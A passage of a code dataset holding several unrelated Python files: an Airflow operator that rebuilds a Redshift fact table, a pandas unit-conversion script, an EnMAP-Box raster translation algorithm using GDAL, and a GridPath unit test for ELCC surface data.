LoadFactOperator(BaseOperator):\n\n ui_color = '#F98866'\n \n drop_table_template = \"\"\"\n DROP TABLE IF EXISTS {}\n \"\"\"\n \n fact_table_template = \"\"\"\n CREATE TABLE {} AS\n {}\n \"\"\"\n \n\n @apply_defaults\n def __init__(self, redshift_conn_id=\"\", table=\"\", sql_query =\"\",\n *args, **kwargs):\n\n super(LoadFactOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.sql_query = sql_query\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n drop_sql = LoadFactOperator.drop_table_template.format(self.table)\n redshift.run(drop_sql)\n fact_sql = LoadFactOperator.fact_table_template.format(self.table, self.sql_query)\n redshift.run(fact_sql)\n self.log.info('LoadFactOperator executed')","repo_name":"thanhvie/de_udacity_project5","sub_path":"plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70082143846","text":"import pandas as pd\n\ntaxa = 5.60\n\nautomovel = pd.read_csv('automovel.csv', sep=';')#\nprint('\\n',automovel.tail(8)) \n\nconvertido = list(automovel['preco'])\npreco_r = []\nfor i in range(len(convertido)):\n preco_r.append(convertido[i] * taxa)\n\nprint(\"Preços convertidos\"+str(preco_r))\n\nautomovel['preco real'] = pd.Series(preco_r)\nprint (automovel)\n\n\nkpl = []\nmpl = list(automovel['consumo'])\nfor j in range(len(mpl)):\n kpl.append(mpl[j] / 0.425143707)\n\nautomovel['consumo'] = pd.Series(kpl)\nprint (automovel)","repo_name":"LucasSargeir/Estudo","sub_path":"Python/Pandas/exemplo_2.py","file_name":"exemplo_2.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880640466","text":"from math import isnan\r\nfrom typing import Dict, Any, List, Tuple\r\n\r\nimport numpy as np\r\nfrom osgeo import 
gdal\r\n\r\nfrom enmapbox.typeguard import typechecked\r\nfrom enmapboxprocessing.algorithm.writeenviheaderalgorithm import WriteEnviHeaderAlgorithm\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.rasterreader import RasterReader\r\nfrom enmapboxprocessing.rasterwriter import RasterWriter\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback, QgsRectangle, QgsRasterLayer,\r\n QgsRasterDataProvider, QgsPoint, QgsPointXY, QgsMapLayer)\r\n\r\n\r\n@typechecked\r\nclass TranslateRasterAlgorithm(EnMAPProcessingAlgorithm):\r\n P_RASTER, _RASTER = 'raster', 'Raster layer'\r\n P_BAND_LIST, _BAND_LIST = 'bandList', 'Selected bands'\r\n P_GRID, _GRID = 'grid', 'Grid'\r\n P_SPECTRAL_RASTER, _SPECTRAL_RASTER = 'spectralSubset', 'Spectral raster layer for band subsetting'\r\n P_SPECTRAL_BAND_LIST, _SPECTRAL_BAND_LIST = 'spectralBandList', 'Selected spectral bands'\r\n P_OFFSET, _OFFSET = 'offset', 'Data offset value'\r\n P_SCALE, _SCALE = 'scale', 'Data gain/scale value'\r\n P_COPY_METADATA, _COPY_METADATA = 'copyMetadata', 'Copy metadata'\r\n P_COPY_STYLE, _COPY_STYLE = 'copyStyle', 'Copy style'\r\n P_EXCLUDE_BAD_BANDS, _EXCLUDE_BAD_BANDS = 'excludeBadBands', 'Exclude bad bands'\r\n P_EXCLUDE_DERIVED_BAD_BANDS, _EXCLUDE_DERIVED_BAD_BANDS = \\\r\n 'excludeDerivedBadBands', 'Derive and exclude additional bad bands'\r\n P_WRITE_ENVI_HEADER, _WRITE_ENVI_HEADER = 'writeEnviHeader', 'Write ENVI header'\r\n P_EXTENT, _EXTENT = 'extent', 'Spatial extent'\r\n P_SOURCE_COLUMNS, _SOURCE_COLUMNS = 'sourceColumns', 'Column subset'\r\n P_SOURCE_ROWS, _SOURCE_ROWS = 'sourceRows', 'Row subset'\r\n P_RESAMPLE_ALG, _RESAMPLE_ALG = 'resampleAlg', 'Resample algorithm'\r\n P_SOURCE_NODATA, _SOURCE_NODATA = 'sourceNoData', 'Source no data value'\r\n P_NODATA, _NODATA = 'noData', 'No data value'\r\n P_UNSET_SOURCE_NODATA, _UNSET_SOURCE_NODATA = 'unsetSourceNoData', 'Unset source no data value'\r\n P_UNSET_NODATA, _UNSET_NODATA = 'unsetNoData', 'Unset no data value'\r\n P_WORKING_DATA_TYPE, _WORKING_DATA_TYPE = 'workingType', 'Working Data type'\r\n P_DATA_TYPE, _DATA_TYPE = 'dataType', 'Data type'\r\n P_CREATION_PROFILE, _CREATION_PROFILE = 'creationProfile', 'Output options'\r\n P_OUTPUT_RASTER, _OUTPUT_RASTER = 'outputTranslatedRaster', 'Output raster layer'\r\n\r\n def displayName(self):\r\n return 'Translate raster layer'\r\n\r\n def shortDescription(self):\r\n return 'Convert raster data between different formats, ' \\\r\n 'potentially performing some operations like spatial subsetting, spatial resampling, reprojection, ' \\\r\n 'band subsetting, band reordering, data scaling, no data value specification, and data type conversion.'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._RASTER, 'Source raster layer.'),\r\n (self._BAND_LIST, 'Bands to subset and rearrange. '\r\n 'An empty selection defaults to all bands in native order.'),\r\n (self._GRID, 'The destination grid.'),\r\n (self._COPY_METADATA, 'Whether to copy GDAL metadata from source to destination.'),\r\n (self._COPY_STYLE, 'Whether to copy style from source to destination.'),\r\n (self._EXCLUDE_BAD_BANDS, 'Whether to exclude bad bands (given by BBL metadata item inside ENVI domain). 
'\r\n 'Also see The ENVI Header Format for more details: '\r\n 'https://www.l3harrisgeospatial.com/docs/ENVIHeaderFiles.html'),\r\n (self._EXCLUDE_DERIVED_BAD_BANDS,\r\n 'Whether to derive and exclude additional bad bands fully filled with inf, nan or no data values.'),\r\n (self._WRITE_ENVI_HEADER, 'Whether to write an ENVI header *.hdr sidecar file with '\r\n 'spectral metadata required for proper visualization in ENVI software.'),\r\n (self._CREATION_PROFILE, 'Output format and creation options. '\r\n 'The default format is GeoTiff with creation options: '\r\n '' + ', '.join(self.DefaultGTiffCreationOptions)),\r\n (self._SPECTRAL_RASTER, 'A spectral raster layer used for specifying a band subset '\r\n 'by matching the center wavelength.'),\r\n (self._SPECTRAL_BAND_LIST, 'Spectral bands used to match source raster bands.'\r\n 'An empty selection defaults to all bands in native order.'),\r\n (self._OFFSET, 'A data offset value applied to each band.'),\r\n (self._SCALE, 'A data gain/scale value applied to each band.'),\r\n (self._EXTENT, 'Spatial extent for clipping the destination grid, '\r\n 'which is given by the source Raster or the selected Grid. '\r\n 'In both cases, the extent is aligned with the actual pixel grid '\r\n 'to avoid subpixel shifts.'),\r\n (self._SOURCE_COLUMNS, 'Column subset range in pixels to extract.'),\r\n (self._SOURCE_ROWS, 'Rows subset range in pixels to extract.'),\r\n (self._RESAMPLE_ALG, 'Spatial resample algorithm.'),\r\n (self._SOURCE_NODATA, 'The value to be used instead of the original raster layer no data value.'),\r\n (self._NODATA, 'The value to be used instead of the default destination no data value.'),\r\n (self._UNSET_SOURCE_NODATA, 'Whether to unset (i.e. not use) the source no data value.'),\r\n (self._UNSET_NODATA, 'Whether to unset the destination no data value.'),\r\n (self._WORKING_DATA_TYPE, 'Working data type that is applied before resampling.'),\r\n (self._DATA_TYPE, 'Output data type.'),\r\n (self._OUTPUT_RASTER, self.RasterFileDestination)\r\n ]\r\n\r\n def checkParameterValues(self, parameters: Dict[str, Any], context: QgsProcessingContext) -> Tuple[bool, str]:\r\n return True, ''\r\n\r\n def parameterAsSourceWindowExtent(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext\r\n ) -> QgsRectangle:\r\n\r\n raster = self.parameterAsRasterLayer(parameters, self.P_RASTER, context)\r\n provider: QgsRasterDataProvider = raster.dataProvider()\r\n\r\n xmin, xmax = self.parameterAsRange(parameters, self.P_SOURCE_COLUMNS, context)\r\n ymin, ymax = self.parameterAsRange(parameters, self.P_SOURCE_ROWS, context)\r\n skipRangeX = isnan(xmin) and isnan(xmax)\r\n skipRangeY = isnan(ymin) and isnan(ymax)\r\n if skipRangeX and skipRangeY:\r\n return QgsRectangle()\r\n\r\n if isnan(xmin):\r\n xmin = 0\r\n if isnan(ymin):\r\n ymin = 0\r\n if isnan(xmax):\r\n xmax = xmin + raster.width() - 1\r\n if isnan(ymax):\r\n ymax = ymin + raster.height() - 1\r\n p1: QgsPoint = provider.transformCoordinates(QgsPoint(xmin, ymin), QgsRasterDataProvider.TransformImageToLayer)\r\n p2: QgsPoint = provider.transformCoordinates(\r\n QgsPoint(xmax + 1, ymax + 1), QgsRasterDataProvider.TransformImageToLayer\r\n )\r\n return QgsRectangle(QgsPointXY(p1), QgsPointXY(p2))\r\n\r\n def group(self):\r\n return Group.RasterConversion.value\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterRasterLayer(self.P_RASTER, self._RASTER)\r\n self.addParameterBandList(\r\n self.P_BAND_LIST, self._BAND_LIST, 
parentLayerParameterName=self.P_RASTER, optional=True\r\n )\r\n self.addParameterRasterLayer(self.P_GRID, self._GRID, None, True)\r\n self.addParameterBoolean(self.P_COPY_METADATA, self._COPY_METADATA, True)\r\n self.addParameterBoolean(self.P_COPY_STYLE, self._COPY_STYLE, False)\r\n self.addParameterBoolean(self.P_EXCLUDE_BAD_BANDS, self._EXCLUDE_BAD_BANDS, False)\r\n self.addParameterBoolean(self.P_EXCLUDE_DERIVED_BAD_BANDS, self._EXCLUDE_DERIVED_BAD_BANDS, False)\r\n self.addParameterBoolean(self.P_WRITE_ENVI_HEADER, self._WRITE_ENVI_HEADER, True)\r\n self.addParameterRasterLayer(self.P_SPECTRAL_RASTER, self._SPECTRAL_RASTER, None, True, True)\r\n self.addParameterBandList(\r\n self.P_SPECTRAL_BAND_LIST, self._SPECTRAL_BAND_LIST, None, self.P_SPECTRAL_RASTER, True, True\r\n )\r\n self.addParameterFloat(self.P_OFFSET, self._OFFSET, None, True, None, None, True)\r\n self.addParameterFloat(self.P_SCALE, self._SCALE, None, True, None, None, True)\r\n self.addParameterExtent(self.P_EXTENT, self._EXTENT, None, True, True)\r\n self.addParameterIntRange(self.P_SOURCE_COLUMNS, self._SOURCE_COLUMNS, None, True, True)\r\n self.addParameterIntRange(self.P_SOURCE_ROWS, self._SOURCE_ROWS, None, True, True)\r\n self.addParameterResampleAlg(self.P_RESAMPLE_ALG, self._RESAMPLE_ALG, 0, False, True)\r\n self.addParameterFloat(self.P_SOURCE_NODATA, self._SOURCE_NODATA, None, True, None, None, True)\r\n self.addParameterFloat(self.P_NODATA, self._NODATA, None, True, None, None, True)\r\n self.addParameterBoolean(self.P_UNSET_SOURCE_NODATA, self._UNSET_SOURCE_NODATA, False, False, True)\r\n self.addParameterBoolean(self.P_UNSET_NODATA, self._UNSET_NODATA, False, False, True)\r\n self.addParameterDataType(self.P_WORKING_DATA_TYPE, self._WORKING_DATA_TYPE, None, True, True)\r\n self.addParameterDataType(self.P_DATA_TYPE, self._DATA_TYPE, None, True, True)\r\n self.addParameterCreationProfile(self.P_CREATION_PROFILE, self._CREATION_PROFILE, '', True, False)\r\n self.addParameterRasterDestination(self.P_OUTPUT_RASTER, self._OUTPUT_RASTER, allowEnvi=True, allowVrt=True)\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n raster = self.parameterAsRasterLayer(parameters, self.P_RASTER, context)\r\n provider: QgsRasterDataProvider = raster.dataProvider()\r\n bandList = self.parameterAsInts(parameters, self.P_BAND_LIST, context)\r\n grid = self.parameterAsRasterLayer(parameters, self.P_GRID, context)\r\n if grid is None:\r\n grid = raster\r\n spectralRaster = self.parameterAsSpectralRasterLayer(parameters, self.P_SPECTRAL_RASTER, context)\r\n spectralBandList = self.parameterAsInts(parameters, self.P_SPECTRAL_BAND_LIST, context)\r\n offset = self.parameterAsFloat(parameters, self.P_OFFSET, context)\r\n scale = self.parameterAsFloat(parameters, self.P_SCALE, context)\r\n extent = self.parameterAsExtent(parameters, self.P_EXTENT, context, crs=grid.crs())\r\n if not extent.isEmpty():\r\n extent = Utils.snapExtentToRaster(extent, grid)\r\n sourceWindowExtent = self.parameterAsSourceWindowExtent(parameters, context)\r\n if not sourceWindowExtent.isEmpty():\r\n extent = sourceWindowExtent\r\n grid = raster # even if grid is specified, use the source raster\r\n if extent.isEmpty():\r\n extent = grid.extent()\r\n excludeBadBands = self.parameterAsBoolean(parameters, self.P_EXCLUDE_BAD_BANDS, context)\r\n excludeDerivedBadBands = self.parameterAsBoolean(parameters, self.P_EXCLUDE_DERIVED_BAD_BANDS, context)\r\n 
resampleAlg = self.parameterAsGdalResampleAlg(parameters, self.P_RESAMPLE_ALG, context)\r\n srcNoDataValue = self.parameterAsFloat(parameters, self.P_SOURCE_NODATA, context)\r\n dstNoDataValue = self.parameterAsFloat(parameters, self.P_NODATA, context)\r\n unsetSrcNoDataValue = self.parameterAsBoolean(parameters, self.P_UNSET_SOURCE_NODATA, context)\r\n unsetDstNoDataValue = self.parameterAsBoolean(parameters, self.P_UNSET_NODATA, context)\r\n dataType = self.parameterAsQgsDataType(parameters, self.P_DATA_TYPE, context, default=provider.dataType(1))\r\n workingDataType = self.parameterAsQgsDataType(parameters, self.P_WORKING_DATA_TYPE, context)\r\n copyMetadata = self.parameterAsBoolean(parameters, self.P_COPY_METADATA, context)\r\n copyStyle = self.parameterAsBoolean(parameters, self.P_COPY_STYLE, context)\r\n writeEnviHeader = self.parameterAsBoolean(parameters, self.P_WRITE_ENVI_HEADER, context)\r\n filename = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_RASTER, context)\r\n format, options = self.parameterAsCreationProfile(parameters, self.P_CREATION_PROFILE, context, filename)\r\n width = int(round(extent.width() / grid.rasterUnitsPerPixelX()))\r\n height = int(round(extent.height() / grid.rasterUnitsPerPixelY()))\r\n crs = grid.crs()\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n reader = RasterReader(raster)\r\n gdalDataType = Utils.qgisDataTypeToGdalDataType(dataType)\r\n\r\n # exclude bad bands\r\n if excludeBadBands or excludeDerivedBadBands:\r\n\r\n def isBadBand(bandNo: int) -> bool:\r\n if excludeBadBands:\r\n if reader.badBandMultiplier(bandNo) == 0:\r\n return True\r\n if excludeDerivedBadBands:\r\n array = reader.array(bandList=[bandNo])\r\n marray = reader.maskArray(\r\n array, bandList=[bandNo],\r\n maskNotFinite=excludeDerivedBadBands,\r\n )\r\n if not np.any(marray):\r\n return True\r\n return False\r\n\r\n if bandList is None:\r\n bandList = list(reader.bandNumbers())\r\n\r\n bandList = [bandNo for bandNo in bandList if not isBadBand(bandNo)]\r\n\r\n # spectral subset\r\n if spectralRaster is not None:\r\n spectralReader = RasterReader(spectralRaster)\r\n\r\n if bandList is None:\r\n bandList = [i + 1 for i in range(reader.bandCount())]\r\n\r\n if spectralBandList is None:\r\n spectralBandList = [i + 1 for i in range(spectralRaster.bandCount())]\r\n\r\n wavelength = np.array([reader.wavelength(bandNo) for bandNo in bandList])\r\n bandList = [int(np.argmin(np.abs(wavelength - spectralReader.wavelength(bandNo))) + 1)\r\n for bandNo in spectralBandList]\r\n\r\n if bandList is None:\r\n nBands = raster.bandCount()\r\n else:\r\n nBands = len(bandList)\r\n\r\n # derive source and destination no data values\r\n if srcNoDataValue is None:\r\n # get no data value from QGIS layer and layer properties\r\n if reader.sourceHasNoDataValue() and reader.useSourceNoDataValue():\r\n srcNoDataValue = None # use default no data value\r\n else:\r\n rasterRanges = reader.userNoDataValues()\r\n if len(rasterRanges) == 1:\r\n srcNoDataValue = rasterRanges[0].min() # use user no data value\r\n else:\r\n srcNoDataValue = 'none' # unset no data value\r\n if unsetSrcNoDataValue:\r\n srcNoDataValue = 'none' # unset no data value\r\n if unsetDstNoDataValue:\r\n dstNoDataValue = 'none' # unset no data value\r\n\r\n infoTail = f' [{width}x{height}x{nBands}]({Utils.qgisDataTypeName(dataType)})'\r\n if format is not None:\r\n infoTail += f' -of {format}'\r\n if 
options is not None:\r\n infoTail += f' -co {\" \".join(options)}'\r\n infoTail += f' {filename}'\r\n\r\n if workingDataType is None:\r\n rasterSource = raster.source()\r\n else:\r\n rasterSource = Utils.tmpFilename(filename, 'workingRaster.tif')\r\n gdal.Translate(\r\n rasterSource, raster.source(),\r\n options=gdal.TranslateOptions(outputType=Utils.qgisDataTypeToGdalDataType(workingDataType))\r\n )\r\n\r\n gdalDataset = gdal.Open(rasterSource)\r\n assert gdalDataset is not None\r\n\r\n callback = Utils.qgisFeedbackToGdalCallback(feedback)\r\n resampleAlgSupportedByGdalTranslate = resampleAlg not in [gdal.GRA_Min, gdal.GRA_Q1, gdal.GRA_Med,\r\n gdal.GRA_Q3, gdal.GRA_Max]\r\n useGdalTranslate = raster.crs() == crs and resampleAlgSupportedByGdalTranslate and dstNoDataValue is None\r\n if useGdalTranslate:\r\n feedback.pushInfo('Translate raster' + infoTail)\r\n\r\n projWin = (extent.xMinimum(), extent.yMaximum(), extent.xMaximum(), extent.yMinimum())\r\n if not grid.crs().isValid():\r\n # dirty fix for issue #1082\r\n if abs(projWin[2]) == raster.width() and abs(projWin[3]) == raster.height():\r\n projWin = None\r\n\r\n translateOptions = gdal.TranslateOptions(\r\n format=format, width=width, height=height, creationOptions=options, resampleAlg=resampleAlg,\r\n projWin=projWin, bandList=bandList, outputType=gdalDataType, callback=callback,\r\n noData=srcNoDataValue\r\n )\r\n outGdalDataset: gdal.Dataset = gdal.Translate(\r\n destName=filename, srcDS=gdalDataset, options=translateOptions\r\n )\r\n assert outGdalDataset is not None\r\n\r\n # need to explicitely set the GeoTransform tuple, because gdal.Translate extent may deviate slightly\r\n if grid.crs().isValid():\r\n ulx, uly, lrx, lry = projWin\r\n xres = (lrx - ulx) / width\r\n yres = (uly - lry) / height\r\n geoTransform = (ulx, xres, 0., uly, 0., -yres)\r\n outGdalDataset.SetGeoTransform(geoTransform)\r\n else: # use gdal warp\r\n if bandList is not None:\r\n tmpFilename = Utils.tmpFilename(filename, 'bandSubset.vrt')\r\n tmpGdalDataset = gdal.Translate(\r\n destName=tmpFilename, srcDS=gdalDataset, format=self.VrtFormat, bandList=bandList,\r\n noData=srcNoDataValue, callback=callback\r\n )\r\n else:\r\n tmpGdalDataset = gdalDataset\r\n\r\n feedback.pushInfo('Warp raster' + infoTail)\r\n outputBounds = (extent.xMinimum(), extent.yMinimum(), extent.xMaximum(), extent.yMaximum())\r\n dstSRS = crs.toWkt()\r\n resampleAlgString = Utils.gdalResampleAlgToGdalWarpFormat(resampleAlg)\r\n warpOptions = gdal.WarpOptions(\r\n format=format, width=width, height=height, creationOptions=options, resampleAlg=resampleAlgString,\r\n outputBounds=outputBounds, outputType=gdalDataType, dstSRS=dstSRS, srcNodata=srcNoDataValue,\r\n dstNodata=dstNoDataValue, callback=callback\r\n )\r\n outGdalDataset: gdal.Dataset = gdal.Warp(\r\n filename, tmpGdalDataset, options=warpOptions\r\n )\r\n assert outGdalDataset is not None\r\n\r\n del outGdalDataset # close and reopen to write metadata to aux.xml\r\n outGdalDataset = gdal.Open(filename)\r\n\r\n writer = RasterWriter(outGdalDataset)\r\n if bandList is None:\r\n bandList = range(1, reader.bandCount() + 1)\r\n metadata = reader.metadata()\r\n if copyMetadata:\r\n writer.setMetadata(metadata)\r\n else:\r\n for domain in metadata:\r\n writer.setMetadataDomain({}, domain)\r\n for dstBandNo, srcBandNo in enumerate(bandList, 1):\r\n # general metadata\r\n metadata = reader.metadata(srcBandNo)\r\n\r\n if copyMetadata:\r\n writer.setMetadata(metadata, dstBandNo)\r\n # band name\r\n bandName = 
reader.bandName(srcBandNo)\r\n writer.setBandName(bandName, dstBandNo)\r\n # spectral info\r\n wavelength = reader.wavelength(srcBandNo)\r\n writer.setWavelength(wavelength, dstBandNo)\r\n fwhm = reader.fwhm(srcBandNo)\r\n writer.setFwhm(fwhm, dstBandNo)\r\n badBandMultiplier = reader.badBandMultiplier(srcBandNo)\r\n writer.setBadBandMultiplier(badBandMultiplier, dstBandNo)\r\n else:\r\n for domain in metadata:\r\n writer.setMetadataDomain({}, domain)\r\n\r\n # clean up ENVI metadata domain (see #1098)\r\n metadata = reader.metadataDomain('ENVI')\r\n metadata.pop('wavelength_units', None)\r\n for key in list(metadata):\r\n if len(metadata[key]) == reader.bandCount():\r\n metadata.pop(key, None)\r\n writer.setMetadataDomain(metadata, 'ENVI')\r\n\r\n # clean up Default metadata domain (see #1098)\r\n metadata = reader.metadataDomain()\r\n metadata.pop('wavelength_units', None)\r\n for key in [f'Band_{bandNo}' for bandNo in reader.bandNumbers()]:\r\n metadata.pop(key, None)\r\n writer.setMetadataDomain(metadata)\r\n\r\n if copyStyle:\r\n renderer = raster.renderer().clone()\r\n outraster = QgsRasterLayer(filename)\r\n outraster.setRenderer(renderer)\r\n outraster.saveDefaultStyle(QgsMapLayer.StyleCategory.AllStyleCategories)\r\n del outraster\r\n\r\n driverShortName = writer.gdalDataset.GetDriver().ShortName\r\n del writer, outGdalDataset\r\n\r\n # need to re-open the raster before setting the scal/offset (issue #501)\r\n outGdalDataset = gdal.Open(filename)\r\n writer = RasterWriter(outGdalDataset)\r\n for dstBandNo, srcBandNo in enumerate(bandList, 1):\r\n if offset is None:\r\n writer.setOffset(reader.offset(srcBandNo), dstBandNo)\r\n else:\r\n writer.setOffset(offset, dstBandNo)\r\n if scale is None:\r\n writer.setScale(reader.scale(srcBandNo), dstBandNo)\r\n else:\r\n writer.setScale(scale, dstBandNo)\r\n del writer, outGdalDataset\r\n\r\n if writeEnviHeader:\r\n if driverShortName in ['GTiff', 'ENVI']:\r\n alg = WriteEnviHeaderAlgorithm()\r\n parameters = {alg.P_RASTER: filename}\r\n self.runAlg(alg, parameters, None, feedback2, context, True)\r\n\r\n result = {self.P_OUTPUT_RASTER: filename}\r\n self.toc(feedback, result)\r\n\r\n return result\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/translaterasteralgorithm.py","file_name":"translaterasteralgorithm.py","file_ext":"py","file_size_in_byte":23450,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"27383316193","text":"from collections import OrderedDict\nfrom importlib import import_module\nimport os.path\nimport sys\nimport unittest\n\nfrom tests.common_functions import create_abstract_model, add_components_and_load_data\n\nTEST_DATA_DIRECTORY = os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"..\", \"test_data\"\n)\n\n# Import prerequisite modules\nPREREQUISITE_MODULE_NAMES = [\n \"temporal.operations.timepoints\",\n \"temporal.operations.horizons\",\n \"temporal.investment.periods\",\n \"geography.load_zones\",\n \"geography.prm_zones\",\n \"project\",\n \"project.capacity.capacity\",\n \"project.reliability.prm\",\n \"project.reliability.prm.prm_types\",\n]\nNAME_OF_MODULE_BEING_TESTED = \"project.reliability.prm.elcc_surface\"\nIMPORTED_PREREQ_MODULES = list()\nfor mdl in PREREQUISITE_MODULE_NAMES:\n try:\n imported_module = import_module(\".\" + str(mdl), package=\"gridpath\")\n IMPORTED_PREREQ_MODULES.append(imported_module)\n except ImportError:\n print(\"ERROR! 
Module \" + str(mdl) + \" not found.\")\n sys.exit(1)\n# Import the module we'll test\ntry:\n MODULE_BEING_TESTED = import_module(\n \".\" + NAME_OF_MODULE_BEING_TESTED, package=\"gridpath\"\n )\nexcept ImportError:\n print(\"ERROR! Couldn't import module \" + NAME_OF_MODULE_BEING_TESTED + \" to test.\")\n\n\nclass TestProjELCCSurface(unittest.TestCase):\n \"\"\" \"\"\"\n\n def test_add_model_components(self):\n \"\"\"\n Test that there are no errors when adding model components\n :return:\n \"\"\"\n create_abstract_model(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n\n def test_load_model_data(self):\n \"\"\"\n Test that data are loaded with no errors\n :return:\n \"\"\"\n add_components_and_load_data(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n\n def test_data_loaded_correctly(self):\n \"\"\"\n Test that the data loaded are as expected\n :return:\n \"\"\"\n m, data = add_components_and_load_data(\n prereq_modules=IMPORTED_PREREQ_MODULES,\n module_to_test=MODULE_BEING_TESTED,\n test_data_dir=TEST_DATA_DIRECTORY,\n subproblem=\"\",\n stage=\"\",\n )\n instance = m.create_instance(data)\n\n # Set: ELCC_SURFACE_PRM_ZONE_PERIODS\n expected_surface_zone_periods = sorted(\n [\n (\"Nuclear\", \"PRM_Zone1\", 2020),\n (\"Nuclear\", \"PRM_Zone1\", 2030),\n (\"Wind_Solar\", \"PRM_Zone1\", 2020),\n (\"Wind_Solar\", \"PRM_Zone1\", 2030),\n (\"Wind_Solar\", \"PRM_Zone2\", 2020),\n (\"Wind_Solar\", \"PRM_Zone2\", 2030),\n ]\n )\n\n actual_surface_zone_periods = sorted(\n [(s, z, p) for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS]\n )\n\n self.assertListEqual(expected_surface_zone_periods, actual_surface_zone_periods)\n\n # Param: prm_peak_load_mw\n expected_peak_load = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"PRM_Zone1\", 2020): 49406.65942,\n (\"Nuclear\", \"PRM_Zone1\", 2030): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone1\", 2020): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone1\", 2030): 49406.65942,\n (\"Wind_Solar\", \"PRM_Zone2\", 2020): 49913.83791,\n (\"Wind_Solar\", \"PRM_Zone2\", 2030): 49913.83791,\n }.items()\n )\n )\n\n actual_peak_load = OrderedDict(\n sorted(\n {\n (s, z, p): instance.prm_peak_load_mw[s, z, p]\n for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_peak_load, actual_peak_load)\n\n # Param: prm_annual_load_mwh\n expected_annual_load = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"PRM_Zone1\", 2020): 242189141,\n (\"Nuclear\", \"PRM_Zone1\", 2030): 242189141,\n (\"Wind_Solar\", \"PRM_Zone1\", 2020): 242189141,\n (\"Wind_Solar\", \"PRM_Zone1\", 2030): 242189141,\n (\"Wind_Solar\", \"PRM_Zone2\", 2020): 244545760.8,\n (\"Wind_Solar\", \"PRM_Zone2\", 2030): 244545760.8,\n }.items()\n )\n )\n\n actual_annual_load = OrderedDict(\n sorted(\n {\n (s, z, p): instance.prm_annual_load_mwh[s, z, p]\n for (s, z, p) in instance.ELCC_SURFACE_PRM_ZONE_PERIODS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_annual_load, actual_annual_load)\n\n # Param: elcc_surface_name\n expected_elcc_surface_names = OrderedDict(\n sorted(\n {\n \"Coal\": None,\n \"Coal_z2\": None,\n \"Gas_CCGT\": None,\n \"Gas_CCGT_New\": None,\n \"Gas_CCGT_New_Binary\": None,\n \"Gas_CCGT_z2\": None,\n \"Gas_CT\": None,\n \"Gas_CT_New\": None,\n \"Gas_CT_z2\": None,\n \"Nuclear\": \"Nuclear\",\n \"Nuclear_z2\": None,\n \"Wind\": 
\"Wind_Solar\",\n \"Wind_z2\": \"Wind_Solar\",\n \"Battery\": None,\n \"Battery_Binary\": None,\n \"Battery_Specified\": None,\n \"Hydro\": None,\n \"Hydro_NonCurtailable\": None,\n \"Disp_Binary_Commit\": None,\n \"Disp_Cont_Commit\": None,\n \"Disp_No_Commit\": None,\n \"Clunky_Old_Gen\": None,\n \"Clunky_Old_Gen2\": None,\n \"Nuclear_Flexible\": None,\n }.items()\n )\n )\n\n actual_elcc_surface_names = OrderedDict(\n sorted(\n {\n p: instance.elcc_surface_name[p] for p in instance.PRM_PROJECTS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_elcc_surface_names, actual_elcc_surface_names)\n\n # Param: elcc_surface_cap_factor\n expected_elcc_cf = OrderedDict(\n sorted(\n {\n \"Coal\": None,\n \"Coal_z2\": None,\n \"Gas_CCGT\": None,\n \"Gas_CCGT_New\": None,\n \"Gas_CCGT_New_Binary\": None,\n \"Gas_CCGT_z2\": None,\n \"Gas_CT\": None,\n \"Gas_CT_New\": None,\n \"Gas_CT_z2\": None,\n \"Nuclear\": 0.123,\n \"Nuclear_z2\": None,\n \"Wind\": 0.123,\n \"Wind_z2\": 0.123,\n \"Battery\": None,\n \"Battery_Binary\": None,\n \"Battery_Specified\": None,\n \"Hydro\": None,\n \"Hydro_NonCurtailable\": None,\n \"Disp_Binary_Commit\": None,\n \"Disp_Cont_Commit\": None,\n \"Disp_No_Commit\": None,\n \"Clunky_Old_Gen\": None,\n \"Clunky_Old_Gen2\": None,\n \"Nuclear_Flexible\": None,\n }.items()\n )\n )\n\n actual_elcc_cf = OrderedDict(\n sorted(\n {\n p: instance.elcc_surface_cap_factor[p]\n for p in instance.PRM_PROJECTS\n }.items()\n )\n )\n\n self.assertDictEqual(expected_elcc_cf, actual_elcc_cf)\n\n # Set: ELCC_SURFACE_PROJECTS\n expected_elcc_surf_prj = sorted(\n [(\"Nuclear\", \"Nuclear\"), 